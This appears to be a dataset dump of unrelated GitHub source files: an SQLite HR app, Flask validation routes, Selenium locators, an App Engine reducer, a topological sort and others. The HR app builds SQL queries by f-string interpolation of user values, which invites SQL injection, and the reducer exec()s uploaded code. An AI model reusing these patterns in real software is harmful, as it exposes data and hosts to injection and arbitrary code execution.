| 2022-12-02T06:38:03.338205
| 2020-03-19T12:07:33
| 2020-03-19T12:07:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
import hashlib
import pickle
import numpy
import reedsolo
from memory_profiler import profile
rsc = reedsolo.RSCodec(12)
def load(file):
    """Unpickle and return the object stored in *file*.

    Args:
        file: path to a pickle file.

    Returns:
        The unpickled object, or an empty list when the file is missing
        (preserves the original fallback behavior).
    """
    try:
        # Fix: the original opened the file without ever closing it; the
        # context manager guarantees the handle is released.
        with open(file, "rb") as fin:
            return pickle.load(fin)
    except FileNotFoundError:
        return []
def store(obj, file):
    """Pickle *obj* into *file*, overwriting any existing content.

    Fix: the original left the file handle open (data could stay
    buffered); the context manager flushes and closes it.
    """
    with open(file, "wb") as fout:
        pickle.dump(obj, fout)
def encode(k):
    """Reed-Solomon-encode *k* and return the codeword as one big integer.

    Uses the module-level `rsc` codec (12 ECC symbols).
    """
    codeword_hex = rsc.encode(k).hex()
    return int(codeword_hex, 16)
# @profile
def decode(kcw):
    """Decode an integer codeword back to its original UTF-8 string.

    Returns "" when the codeword is uncorrectable (ReedSolomonError) or
    does not fit in 50 bytes (OverflowError from to_bytes).
    """
    try:
        raw = kcw.to_bytes(50, 'big')
        corrected = rsc.decode(raw)
        return corrected.decode("utf-8").lstrip('\x00')
    except (reedsolo.ReedSolomonError, OverflowError):
        return ""
# @profile
def compute_one_way_hash(x):
    """Return SHA-256 of the UTF-8 encoding of *x* as a big integer."""
    digest_hex = hashlib.sha256(x.encode('utf-8')).hexdigest()
    return int(digest_hex, 16)
def load_biometric(file_name):
    """Load a whitespace-separated numeric biometric template from disk.

    Thin wrapper over numpy.loadtxt; returns a float ndarray.
    """
    return numpy.loadtxt(file_name)
|
[
"30975835+Chirag3345@users.noreply.github.com"
] |
30975835+Chirag3345@users.noreply.github.com
|
dff24bd2b7e3f74e2b44425b4fa1060f68b2f312
|
ea5d18e78ef9fffca5edc27959c348d3534093c2
|
/db.py
|
67898f21f3456fcdd2301578754477c2c16d87b4
|
[] |
no_license
|
Letaldiran/Human-Resources-Department-App
|
27d8f53f01ae15e7759c91e587c53e519defa8e0
|
41f6dbee6b9dc70c0cdfc6d314618a897131ce13
|
refs/heads/main
| 2023-05-29T11:33:18.079038
| 2021-06-17T09:32:58
| 2021-06-17T09:32:58
| 377,773,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,620
|
py
|
import sqlite3
import datetime
def initialize_tables(cur):
    """Drop and recreate the demo schema, then seed it with sample rows.

    Args:
        cur: an open sqlite3 Connection (despite the name; a cursor is
            taken from it below and commit() is called on it at the end).
    """
    conn = cur.cursor()
    # Best-effort drops: the bare excepts deliberately ignore "no such
    # table" on a fresh database.
    try:
        conn.execute('''
        DROP TABLE WORKERS;
        ''')
    except:
        pass
    try:
        conn.execute('''
        DROP TABLE SUBDIVISIONS;
        ''')
    except:
        pass
    try:
        conn.execute('''
        DROP TABLE ORDERS;
        ''')
    except:
        pass
    conn.execute('''
    CREATE TABLE WORKERS(
    ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
    FULLNAME TEXT NOT NULL,
    POSITION TEXT NOT NULL,
    SUBDIVISION TEXT NOT NULL,
    SALARY INT NOT NULL
    );
    ''')
    conn.execute('''
    CREATE TABLE SUBDIVISIONS(
    ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
    TITLE TEXT NOT NULL,
    POSITIONS TEXT NOT NULL,
    UNITSIZE INT NOT NULL
    );
    ''')
    conn.execute('''
    CREATE TABLE ORDERS(
    ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
    TITLE TEXT NOT NULL,
    TYPE TEXT NOT NULL,
    TEXT TEXT NOT NULL,
    DATE DATE NOT NULL
    );
    ''')
    # Seed data: six workers, three subdivisions, three HR orders.
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (1,'Smirnov Alexander','Engineer','Technical Department',18680);
    ''')
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (2,'Gotie Alan','Team-Lead','Development Department',23120);
    ''')
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (3,'Meril Andrea','Marketer','Sales Department',13660);
    ''')
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (4,'Anderson Paul','Web-developer','Development Department',15500);
    ''')
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (5,'Leclerk Anna','Consultant','Sales Department',10700);
    ''')
    conn.execute('''
    INSERT INTO WORKERS (ID,FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES (6,'Sobraj Charles','Accountant','Sales Department',16900);
    ''')
    conn.execute('''
    INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (1,'Technical Department','Tech. Assistant, Technician, Engineer',20);
    ''')
    conn.execute('''
    INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (2,'Development Department','Web-developer, Team-Lead, DevOps',35);
    ''')
    conn.execute('''
    INSERT INTO SUBDIVISIONS (ID,TITLE,POSITIONS,UNITSIZE) VALUES (3,'Sales Department','Marketer, Consultant, Accountant',55);
    ''')
    conn.execute('''
    INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (1,'Transfer order', 'Transfer', 'Alan Gotie is transfered to Development Department as Team-Lead for good and qualitative work', '2021/04/09');
    ''')
    conn.execute('''
    INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (2,'Dismissal order', 'Dismissal', 'Sahar Musal is fired for his bad attitude and non-proffesionalism', '2020/06/21');
    ''')
    conn.execute('''
    INSERT INTO ORDERS (ID,TITLE,TYPE,TEXT,DATE) VALUES (3,'Hiring order', 'Hiring','Charles Sobraj is hired for us to perform work', '2021/05/19');
    ''')
    cur.commit()
class DB():
    """CRUD helpers over the WORKERS / SUBDIVISIONS / ORDERS tables.

    Every method takes an sqlite3 cursor-like object `conn` as its first
    argument and returns plain row tuples.

    NOTE(review): queries are built with f-string interpolation of caller
    values — this is vulnerable to SQL injection (and breaks on values
    containing quotes). Parameterized queries (`?` placeholders, as
    update_subdivisions already uses) should replace the f-strings.
    """
    def get_orders(self, conn):
        """Return all orders as (ID, TITLE, TYPE, TEXT, DATE) tuples."""
        result = []
        for line in conn.execute('''
        SELECT ID,TITLE,TYPE,TEXT,DATE FROM ORDERS;
        '''):
            result.append(line)
        return result
    def get_order(self, conn, ids):
        """Return the order with the given id (list of 0 or 1 tuples)."""
        result = []
        for line in conn.execute(f'''
        SELECT ID,TITLE,TYPE,TEXT,DATE FROM ORDERS WHERE ID={ids};
        '''):
            result.append(line)
        return result
    def get_all_workers(self, conn):
        """Return all workers as (FULLNAME, POSITION, SUBDIVISION, SALARY)."""
        result = []
        for line in conn.execute('''
        SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS;
        '''):
            result.append(line)
        return result
    def get_all_subdivisions(self, conn):
        """Return all subdivisions as (TITLE, POSITIONS, UNITSIZE)."""
        result = []
        for line in conn.execute('''
        SELECT TITLE,POSITIONS,UNITSIZE FROM SUBDIVISIONS;
        '''):
            result.append(line)
        return result
    def get_subdivision_by_name(self, conn, subdivision):
        """Return the subdivision row(s) matching the exact title."""
        result = []
        for line in conn.execute(f'''
        SELECT TITLE,POSITIONS,UNITSIZE FROM SUBDIVISIONS WHERE TITLE='{subdivision}';
        '''):
            result.append(line)
        return result
    def get_subdivision_positions(self, conn, title):
        """Return the comma-separated POSITIONS string for a subdivision."""
        result = []
        for line in conn.execute(f'''
        SELECT POSITIONS FROM SUBDIVISIONS WHERE TITLE='{title}';
        '''):
            result.append(line)
        return result
    def get_worker_by_name(self, conn, fullname):
        """Return the raw cursor for the worker with this exact full name.

        NOTE(review): unlike the other getters this returns the cursor,
        not a list — confirm callers iterate it.
        """
        return conn.execute(f'''
        SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS WHERE FULLNAME='{fullname}';
        ''')
    def get_workers_by_department(self, conn, subdivision):
        """Return all workers belonging to the given subdivision."""
        result = []
        for line in conn.execute(f'''
        SELECT FULLNAME,POSITION,SUBDIVISION,SALARY FROM WORKERS WHERE SUBDIVISION='{subdivision}';
        '''):
            result.append(line)
        return result
    def remove_subdivision_and_people(self, conn, subdivision):
        """Delete a subdivision and all its workers, logging dismissal orders."""
        date = datetime.datetime.now().strftime('%Y\%m\%d')
        # Record one dismissal order per affected worker before deleting.
        for person in self.get_workers_by_department(conn, subdivision):
            self.add_order(conn, 'Dismissal order', 'Dismissal', person[0] + ' was dismissed', date)
        conn.execute(f'''
        DELETE FROM WORKERS WHERE SUBDIVISION='{subdivision}';
        ''')
        conn.execute(f'''
        DELETE FROM SUBDIVISIONS WHERE TITLE='{subdivision}';
        ''')
    def remove_worker(self, conn, fullname):
        """Delete the worker with this exact full name."""
        conn.execute(f'''
        DELETE FROM WORKERS WHERE FULLNAME='{fullname}';
        ''')
    def update_worker(self, conn, fullname, newname, newposition, subdivision, salary):
        """Overwrite a worker's name, position, subdivision and salary."""
        conn.execute(f'''
        UPDATE WORKERS SET FULLNAME='{newname}', POSITION='{newposition}', SUBDIVISION='{subdivision}', SALARY={salary} WHERE FULLNAME = '{fullname}';
        ''')
    def update_subdivisions(self, conn, subdivision, newsubdivisiontitle, newpositions, newunitsize):
        """Rename/resize a subdivision and transfer its workers, with orders."""
        date = datetime.datetime.now().strftime('%Y\%m\%d')
        conn.execute('''
        UPDATE SUBDIVISIONS SET TITLE=?, POSITIONS=?, UNITSIZE=? WHERE TITLE=?;
        ''', (newsubdivisiontitle, newpositions, newunitsize, subdivision))
        # Move every worker to the renamed subdivision and log a transfer.
        for person in self.get_workers_by_department(conn, subdivision):
            self.add_order(conn, 'Transfer order', 'Transfer', person[0] + ' was transferred to ' + newsubdivisiontitle, date)
            self.update_worker(conn, person[0], person[0], person[1], newsubdivisiontitle, person[3])
    def add_worker(self, conn, fullname, position, subdivision, salary):
        """Insert a new worker row (ID auto-assigned)."""
        conn.execute(f'''
        INSERT INTO WORKERS (FULLNAME,POSITION,SUBDIVISION,SALARY) VALUES ('{fullname}','{position}','{subdivision}',{salary});
        ''')
    def add_subdivision(self, conn, title, positions, unitsize):
        """Insert a new subdivision row (ID auto-assigned)."""
        conn.execute(f'''
        INSERT INTO SUBDIVISIONS (TITLE,POSITIONS,UNITSIZE) VALUES ('{title}','{positions}',{unitsize});
        ''')
    def add_order(self, conn, title, type, text, date):
        """Insert a new HR order row (ID auto-assigned)."""
        conn.execute(f'''
        INSERT INTO ORDERS (TITLE,TYPE,TEXT,DATE) VALUES ('{title}','{type}','{text}','{date}');
        ''')
    def update_positions_of_workers_in_subdivision(self, conn, subdivision, newpositions):
        """Rename positions pairwise (old i -> new i) within a subdivision.

        Both position strings are comma-separated; pairs are matched by
        index after splitting on ', '.  NOTE(review): the UPDATE is not
        scoped to the subdivision, so a position name shared across
        departments is renamed everywhere — confirm intended.
        """
        date = datetime.datetime.now().strftime('%Y\%m\%d')
        positions = self.get_subdivision_positions(conn, subdivision)[0][0]
        print(positions)
        print(newpositions)
        if positions!=newpositions:
            for old, new in zip(positions.split(', '), newpositions.split(', ')):
                print(old)
                print(new)
                conn.execute(f'''
                UPDATE WORKERS SET POSITION='{new}' WHERE POSITION = '{old}';
                ''')
                self.add_order(conn, 'Positions changed', 'Swapping ', old + ' was changed to ' + new + ' in department ' + subdivision, date)
if __name__=='__main__':
    # Rebuild the demo database from scratch when run as a script.
    initialize_tables(sqlite3.connect('database.db'))
|
[
"aaaa@gmail.com"
] |
aaaa@gmail.com
|
58572991de8aab3ba45ad300f82a833fe8aab483
|
16dba5fc0cdd15627eaf00ec489be2c3b3e09956
|
/page/web/base_page.py
|
1dab868d22a93b9182712313f1632fff7438a837
|
[] |
no_license
|
lucy1-22/omg_auto
|
894184bb5d97ad605f15eed0c4eee557fb43309e
|
4a1202eaa7c26a79e7ce234bcefad5166550dc01
|
refs/heads/master
| 2022-11-28T20:45:44.094615
| 2020-08-12T05:58:59
| 2020-08-12T05:58:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
# coding=utf-8
from selenium.webdriver.common.by import By
class BasePage:
    """Shared Selenium locators (By.CSS_SELECTOR tuples) for web page objects.

    Each attribute is a (strategy, selector) pair suitable for
    driver.find_element(*locator).
    """
    # Sign-in / account flow controls.
    next_button = (By.CSS_SELECTOR, 'input[value="Next"]')
    sign_button = (By.CSS_SELECTOR, 'span[class="submit"]')
    simple_button = (By.CSS_SELECTOR, 'span.fxs-button-text')
    yes_button = (By.CSS_SELECTOR, 'input[value="Yes"]')
    click_verify_button = (By.CSS_SELECTOR, 'a[class="actionLink"]')
    click_signin_button = (By.CSS_SELECTOR, 'p[class="normalText"]')
    # Portal chrome and progress indicators.
    header_title = (By.CSS_SELECTOR, 'header.fxs-home-title')
    option = (By.CSS_SELECTOR, 'span.fxs-portal-svg')
    wait_notifications = (By.CSS_SELECTOR, 'div.fxs-notificationspane-progressbar.fxs-display-none')
    wait_loading = (By.CSS_SELECTOR, '.fxs-bladecontent-progress.fxs-portal-background.fxs-display-none')
    topbar_sidebar = (By.CSS_SELECTOR, 'a.fxs-topbar-sidebar-collapse-button')
    toolbar_container = (By.CSS_SELECTOR, 'ul.azc-toolbar-container.fxs-commandBar-itemList')
    delete_button = (By.CSS_SELECTOR, 'li[title="Delete"]')
    blade_title = (By.CSS_SELECTOR, 'div.fxs-blade-title-content')
    progress_dots = (By.CSS_SELECTOR, 'fxs-progress-dots-dot')
    # Baidu sanity-check elements.
    baidu_input = (By.CSS_SELECTOR, 'input[class="s_ipt"]')
    baudu_baike = (By.CSS_SELECTOR, 'a[target="_blank"]')
|
[
"v-avliu@microsoft.com"
] |
v-avliu@microsoft.com
|
30ecdf4611a27598b6fe6657a56fac8231062d53
|
1bc74aea75a10e87ae6e195691c99a98e54da395
|
/venv/bin/python/bin/flask
|
be6d6a39df565acc9c5a8f8f5113164c43993c34
|
[] |
no_license
|
omrozh/inads
|
e550a82c6677324e0c983808e8c76017d1bb5c5c
|
a3bcf78949852c359a814e83d102507d1b908de1
|
refs/heads/main
| 2023-06-10T12:59:49.147956
| 2021-07-08T11:31:54
| 2021-07-08T11:31:54
| 384,066,478
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
#!/Users/omerozhan/PycharmProjects/InAdsWeb/venv/bin/python/bin/python
# -*- coding: utf-8 -*-
# Auto-generated console-script shim for the `flask` CLI entry point.
import re
import sys
from flask.cli import main
if __name__ == '__main__':
    # Strip a trailing "-script.pyw"/".exe" suffix from argv[0] so the CLI
    # reports a clean program name (relevant on Windows installs).
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"omrozh@hotmail.com"
] |
omrozh@hotmail.com
|
|
7d8c1cb9db1f31867436ae29567686b448acd023
|
ac7b02f4e7aa751ee24ed8933276990c801e1e64
|
/src/mapreduce/interpreter/python/reducer.py
|
010d238aa4e506c4ccec731f395d038c90905277
|
[] |
no_license
|
emilia-sokol/gae_interpreter
|
563ff02008229679933412ef7defe4f10f1bf02f
|
f1ba7feb46e6e072844859622b30e30a1cf0694a
|
refs/heads/master
| 2022-12-18T16:49:49.339302
| 2020-09-16T17:55:17
| 2020-09-16T17:55:17
| 260,986,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 537
|
py
|
from mapreduce import context
from google.appengine.ext import blobstore
def py_reducer_interpreter(key, values):
    """MapReduce reducer that executes user-supplied Python from blobstore.

    Reads the reducer source from the blob key stored in the mapper's
    output_writer params, runs it with `key`, `values` and an `output`
    list in its globals, then yields one formatted line per output item.

    SECURITY: exec() of blob content runs arbitrary code in this process —
    by design for this interpreter, but only trusted users may upload blobs.
    """
    ctx = context.get()
    file_blob_key = ctx.mapreduce_spec.mapper.params['output_writer']['reducer']
    reader = blobstore.BlobReader(file_blob_key)
    output = []
    # The user script is expected to append (label, count) pairs to `output`.
    exec (reader.read(), {"key": key, "values": values, "output": output})
    for out in output:
        # @TODO store output somewhere and redirect to the source after
        print(out)
        yield "%s: %d\n" % (out[0], out[1])
|
[
"emilia.sokol94@gmail.com"
] |
emilia.sokol94@gmail.com
|
2f734a23bf67cd3cc91a9c971e8bfe20bac6a727
|
0ed22fdbc7716d7a6c6547a0c0b28184409f0ac5
|
/secTools/general_loader.py
|
a49f9f4b21a992a527d18bda817632bc5a5f1e36
|
[] |
no_license
|
yetiminer/dis
|
7dba9b4cba2ab21110e348c2464593b1b09904e0
|
0a781caf2de1d27e2e5109948225ca17ea40965c
|
refs/heads/master
| 2020-03-07T00:45:25.137774
| 2018-08-03T18:24:34
| 2018-08-03T18:24:34
| 127,165,246
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 994
|
py
|
from secTools import yamlLoad, load_from_db, streamline, load_from_pickle
from load_data1 import SecTable, SECdataset
from sqlalchemy import create_engine, MetaData
def ds_from_db(**kwargs):
	"""Build a SECdataset from a pickle snapshot or by re-importing the DB.

	Keyword Args:
		pickle_file: path to a pickled dataset; takes precedence.
		reimport_db: triggers a fresh import; then cfg,
			tag_min_count_threshold, normalise_cols and db_location
			are also required.

	Returns:
		The constructed SECdataset.

	NOTE(review): if neither 'pickle_file' nor 'reimport_db' is passed,
	`ds` is never bound and the return raises NameError — confirm callers
	always supply one of them.
	"""
	if 'pickle_file' in kwargs:
		pickle_file=kwargs['pickle_file']
		ds=load_from_pickle(pickle_file)
	elif 'reimport_db' in kwargs:
		cfg=kwargs['cfg']
		threshold=kwargs['tag_min_count_threshold']
		normalise_cols=kwargs['normalise_cols']
		reimport_db=kwargs['reimport_db']
		db_location=kwargs['db_location']
		engine=create_engine('sqlite:///'+db_location, echo=True)
		data=load_from_db(engine)
		data=streamline(data,cfg)
		ds=SECdataset('ds',cfg,**data)
		# Prune rare tags below the count threshold, then rebuild the
		# feature table and normalise the requested columns in place.
		ds.tag_count_plot(inplace=True)
		ds.feature_prune(thresh=threshold,inplace=True)
		ds.tag=ds.tag_prune(ds.tag)
		ds.pre=ds.tag_prune(ds.pre)
		ds.num=ds.tag_prune(ds.num)
		ds.create_feature_table(inplace=True)
		ds.normalise(inplace=True,cols=normalise_cols)
	return ds
|
[
"github@yetiminer.com"
] |
github@yetiminer.com
|
8b981edc4cd60588dc181c76b776ce8ad0575668
|
955d26b505e1997aeee308e2f27a45fcd30eea8b
|
/reverse.py
|
378bbae40af2892eeff0b59946063779fd46a03a
|
[] |
no_license
|
radzirazak/reverseString
|
9c0e3cdf37bb3dab799057311f2a2541cb9f3235
|
c130da817e3703fc2af3225636c5e6ff1f59dcfb
|
refs/heads/master
| 2021-01-17T17:39:36.794695
| 2017-06-27T06:44:51
| 2017-06-27T06:44:51
| 95,526,320
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 123
|
py
|
def reverseStr(string):
    """Print *string* reversed, prefixed with 'Reverse: '."""
    reversed_text = string[::-1]
    print('Reverse: ' + reversed_text)
# Script entry point: prompt for a line and echo it reversed.
string = input('Enter anything: ')
reverseStr(string)
|
[
"noreply@github.com"
] |
radzirazak.noreply@github.com
|
19cfbbe5fcae30c1301b87cb5938c5e2c0a4f947
|
4a63c700f4e4159dd4089a8488d9c32dbefab471
|
/rgc/views/validation/views.py
|
50aa13bbc6dd86ec8c284e96f3b3c622804afd4c
|
[] |
no_license
|
kaikai136/remote-center
|
4d2072c27d34fda6cf46360a2ef53b7533025287
|
bd002acf7972a96d00f0615a883dca9313a75a5e
|
refs/heads/master
| 2022-09-26T05:22:38.683985
| 2019-09-01T12:17:58
| 2019-09-01T12:17:58
| 205,656,782
| 0
| 0
| null | 2022-09-16T18:09:23
| 2019-09-01T09:43:22
|
Python
|
UTF-8
|
Python
| false
| false
| 4,053
|
py
|
# -*- coding:utf8 -*-
# @Project : remote-center
# @Author : qxq
# @Time : 2019/7/2 9:50 AM
from flask import request, current_app
from rgc import PlatformInfo, AppInfo, CarInfo
from rgc.views.validation import validation_blue
@validation_blue.route("/platisonline/", methods=["POST"])
def plat_is_online():
    """Check whether any platform registered under the POSTed ``ip`` is online.

    Returns a status-code string:
        '1' - missing ``ip`` form field
        '2' - database query failed
        '3' - at least one matching platform is online
        '4' - no matching platform, or none of them is online
    """
    ip = request.form.get('ip')
    if not ip:
        return '1'
    try:
        platform_obj = PlatformInfo.query.filter(PlatformInfo.platformIp == ip).all()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not platform_obj:
        pass  # unknown IP falls through to '4' (treated as offline)
    else:
        for platform in platform_obj:
            if platform.online:
                return '3'
    return '4'
@validation_blue.route("/carisonline/", methods=["POST"])
def car_is_online():
    """Check whether any car registered under the POSTed ``ip`` is online.

    Same status-code convention as plat_is_online:
        '1' - missing ``ip`` form field
        '2' - database query failed
        '3' - at least one matching car is online
        '4' - no matching car, or none of them is online
    """
    ip = request.form.get('ip')
    if not ip:
        return '1'
    try:
        car_obj = CarInfo.query.filter(CarInfo.carIp == ip).all()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    # Removed leftover debug print(ip). An empty result set simply skips the
    # loop and falls through to '4'.
    for car in car_obj:
        if car.online:
            return '3'
    return '4'
@validation_blue.route("/isonline/", methods=["POST"])
def is_online():
    """Check whether the device (car or platform) bound to ``app_key`` is online.

    Returns a status-code string:
        '2' - database query failed, or the app record has an unknown type
        '3' - the bound device exists and is online
        '4' - missing/unknown app_key, or the device is offline
    """
    app_key = request.form.get('app_key')
    if not app_key:
        return '4'
    try:
        app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not app_obj:
        # Unknown key: same fall-through as the original's empty branch.
        return '4'
    # Renamed locals: the originals shadowed the builtins `type` and `id`.
    app_type = app_obj.type
    device_id = app_obj.deviceId
    if app_type == '1':  # '1' => the app record is bound to a car
        try:
            car_obj = CarInfo.query.filter(CarInfo.carId == device_id).first()
        except Exception as e:
            current_app.logger.error(e)
            return '2'
        if car_obj and car_obj.online:
            return '3'
    elif app_type == '2':  # '2' => the app record is bound to a platform
        try:
            plat_obj = PlatformInfo.query.filter(PlatformInfo.platformId == device_id).first()
        except Exception as e:
            current_app.logger.error(e)
            return '2'
        if plat_obj and plat_obj.online:
            return '3'
    else:
        # Unknown device type.
        return '2'
    return '4'
@validation_blue.route("/platValidationKeySerect/", methods=["POST"])
def plat_validation_key_serect():
    """Validate a platform's app_key / app_secret pair.

    Returns a status-code string:
        '1' - missing app_key or app_secret
        '2' - query failed, unknown key, wrong device type, or no platform record
        '3' - key found but the secret does not match
        '4' - credentials are valid
    """
    app_key = request.form.get('app_key')
    app_secret = request.form.get('app_secret')
    if not all([app_key, app_secret]):
        return '1'
    try:
        app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not app_obj:
        return '2'
    if app_obj.type != '2':  # '2' marks a platform-type app record
        return '2'
    if app_obj.app_secret != app_secret:
        return '3'
    try:
        deviceId = app_obj.deviceId
        platform_obj = PlatformInfo.query.filter(PlatformInfo.platformId == deviceId).first()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not platform_obj:
        return '2'
    return '4'
@validation_blue.route("/carValidationKeySerect/", methods=["POST"])
def car_validation_key_serect():
    """Validate a car's app_key / app_secret pair.

    Returns a status-code string:
        '1' - missing app_key or app_secret
        '2' - query failed, unknown key, wrong device type, or no car record
        '3' - key found but the secret does not match
        '4' - credentials are valid
    """
    app_key = request.form.get('app_key')
    app_secret = request.form.get('app_secret')
    if not all([app_key, app_secret]):
        return '1'
    try:
        app_obj = AppInfo.query.filter(AppInfo.app_key == app_key).first()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not app_obj:
        return '2'
    if app_obj.type != '1':  # '1' marks a car-type app record
        return '2'
    if app_obj.app_secret != app_secret:
        return '3'
    try:
        deviceId = app_obj.deviceId
        car_obj = CarInfo.query.filter(CarInfo.carId==deviceId).first()
    except Exception as e:
        current_app.logger.error(e)
        return '2'
    if not car_obj:
        return '2'
    return '4'
|
[
"jienkai136@sina.com"
] |
jienkai136@sina.com
|
3cfee67d95641ce0b56dcb491a6964041a26afe8
|
56cce3fee2e3d69d60958eb2aacc4f65fc3d2230
|
/src/pybgl/topological_sort.py
|
a5c38f65d24d6156a3f6c3a46852d6cdc5478b42
|
[
"BSD-3-Clause"
] |
permissive
|
nokia/PyBGL
|
52c2f175d1dbccb15519f8a16de141845d0abaf3
|
707f2df32ede7d9a992ea217a4791da34f13e138
|
refs/heads/master
| 2023-08-08T04:46:24.931627
| 2023-08-03T16:31:35
| 2023-08-03T16:31:35
| 148,536,169
| 12
| 3
|
BSD-3-Clause
| 2023-08-03T16:31:36
| 2018-09-12T20:11:36
|
Python
|
UTF-8
|
Python
| false
| false
| 1,762
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of the pybgl project.
# https://github.com/nokia/pybgl
from collections import defaultdict, deque
from .graph import DirectedGraph, EdgeDescriptor
from .depth_first_search import DefaultDepthFirstSearchVisitor, depth_first_search_graph
from .property_map import make_assoc_property_map
class TopologicalSortVisitor(DefaultDepthFirstSearchVisitor):
    """DFS visitor that accumulates vertices in reverse finishing order,
    which is exactly a topological ordering for a DAG."""
    def __init__(self, stack):
        """
        Constructor.
        Args:
            stack (deque): The stack used to compute the topological sorting.
        """
        super().__init__()
        self.stack = stack
    def back_edge(self, e :EdgeDescriptor, g :DirectedGraph):
        # A back edge means the graph contains a cycle, so no topological
        # ordering exists.
        raise RuntimeError("Not a DAG")
    def finish_vertex(self, u :int, g :DirectedGraph):
        # Prepending vertices as they finish yields the topological order
        # directly (latest-finished vertex comes first).
        self.stack.appendleft(u)
def topological_sort(g: DirectedGraph, stack: deque = None) -> deque:
    """
    Computes a `topological sorting <https://en.wikipedia.org/wiki/Topological_sorting>`__ of a graph.
    The implementation is based on
    `boost/graph/topological_sort.hpp <https://www.boost.org/doc/libs/1_72_0/boost/graph/topological_sort.hpp>`__.
    Args:
        g (DirectedGraph): The input graph. It must be a `DAG <https://en.wikipedia.org/wiki/Directed_acyclic_graph>`.
        stack (deque): The stack used to store the topological sort,
            updated in place.
            You may pass ``None`` to use the default stack.
    Returns:
        The stack containing the vertices, sorted by topological order.
    """
    # Test identity against None, not truthiness: a caller-supplied *empty*
    # deque must be honored so it really is updated in place as documented
    # (the old `stack if stack else deque()` silently replaced it).
    if stack is None:
        stack = deque()
    depth_first_search_graph(
        g,
        pmap_vcolor = make_assoc_property_map(defaultdict(int)),
        vis = TopologicalSortVisitor(stack)
    )
    return stack
|
[
"marc-olivier.buob@nokia-bell-labs.com"
] |
marc-olivier.buob@nokia-bell-labs.com
|
3467ba1d9f5e15adfb4e7c5ce88988f04e602cab
|
997471990dc68ec45b33b080109756bbe4468cc9
|
/.idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/syntax_error/test_error_using_eval_and_print/test.py
|
285b4627460ebc3a30a5e81e0c87b9000bf021ad
|
[] |
no_license
|
fipachu/Zookeeper
|
3f593628156711fc870dbf5ad2825502594fd2ce
|
28ec4f3fd914f14da9051b15c95b4907adf237b9
|
refs/heads/master
| 2023-04-09T16:46:39.806978
| 2021-04-23T02:00:25
| 2021-04-23T02:00:25
| 360,734,552
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
import unittest
from typing import List
from hstest.stage_test import StageTest
from hstest.test_case import TestCase
class TestEmptyEval(StageTest):
    """hstest stage consisting of a single, input-less test case."""
    def generate(self) -> List[TestCase]:
        # One default TestCase: just run the user program as-is.
        return [
            TestCase()
        ]
class Test(unittest.TestCase):
    """Checks that a SyntaxError raised inside eval() in the tested program is
    reported with the full traceback plus the program's partial output."""
    def test(self):
        status, feedback = TestEmptyEval('main').run_tests()
        # Feedback must include the traceback of the eval(")") SyntaxError.
        self.assertIn('Exception in test #1\n'
                      '\n'
                      'Traceback (most recent call last):\n'
                      '  File "main.py", line 2, in <module>\n'
                      '    print(eval(")"))\n'
                      '  File "<string>", line 1\n'
                      '    )\n'
                      '    ^\n'
                      'SyntaxError: '
                      , feedback)
        # Feedback must also echo whatever the program printed before failing.
        self.assertIn('\n'
                      'Please find below the output of your program during this failed test.\n'
                      '\n'
                      '---\n'
                      '\n'
                      '123', feedback)
        # A non-zero status signals the test run failed, as expected here.
        self.assertNotEqual(status, 0)
# Allow running this test module directly as a script.
if __name__ == '__main__':
    Test().test()
|
[
"80906036+fipachu@users.noreply.github.com"
] |
80906036+fipachu@users.noreply.github.com
|
5ff96b617b7fe456fd632aaaed8a722b91e8b6ae
|
90f15d8f0090d4dcc7550f9d22e7b60c283d2e16
|
/og/dopamine/dopamine/recon_env/val_recon_env.py
|
de92aa55e63f021ec73c9d813343eab41f759988
|
[
"Apache-2.0"
] |
permissive
|
lugrace/OptimizeMRIScanTimes
|
3ee84938b706330fb2319907470e7ae1ab8eb73c
|
fb5bda3b8b5c5258eadbacc9fd4731a3d345a53f
|
refs/heads/master
| 2020-07-08T12:33:48.476391
| 2019-08-22T23:26:37
| 2019-08-22T23:26:37
| 203,673,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,853
|
py
|
import os, sys
import h5py as h5
import numpy as np
